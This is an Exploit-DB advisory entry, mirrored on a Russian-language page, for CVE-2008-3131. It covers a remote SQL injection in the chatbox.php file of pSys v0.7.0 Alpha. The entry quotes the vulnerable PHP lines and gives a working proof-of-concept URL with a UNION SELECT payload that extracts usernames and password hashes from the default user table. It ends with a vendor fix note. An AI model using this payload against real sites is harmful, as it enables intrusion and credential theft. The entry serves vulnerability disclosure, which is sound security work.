- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5977
- Проверка EDB
-
- Пройдено
- Автор
- DNX
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-3131
- Дата публикации
- 2008-06-30
Код:
\#'#/
(-.-)
---------------------oOO---(_)---OOo--------------------
| pSys v0.7.0 Alpha (chatbox.php) Remote SQL Injection |
| (works only with magic quotes = off) |
| coded by DNX |
--------------------------------------------------------
[!] Discovered.: DNX
[!] Vendor.....: http://www.powie.de
[!] Detected...: 22.06.2008
[!] Reported...: 23.06.2008
[!] Response...: 23.06.2008
[!] Background.: pSys is a module based PHP Script
[!] Bug........: $showid in chatbox.php near line 42
12: $showid = $_REQUEST['showid']; //Einzelne ID anzeigen
41: if ($showid != '') {
42: $sqlbefehl = "Select * FROM $tab_quick where id='$showid'";
[!] PoC........: http://127.0.0.1/psys/chatbox.php?showid=' union select 1,username,pwd,4,5,6,7,8 FROM ps_pfuser/*
"ps_" is default database prefix
[!] Solution...: Install updates from cvs (http://www.powie.de/cvsout)
[!] Greetingz..: h0yt3r, k1tk4t, pwndomina, e\o, daneo
# milw0rm.com [2008-06-30]
- Источник
- www.exploit-db.com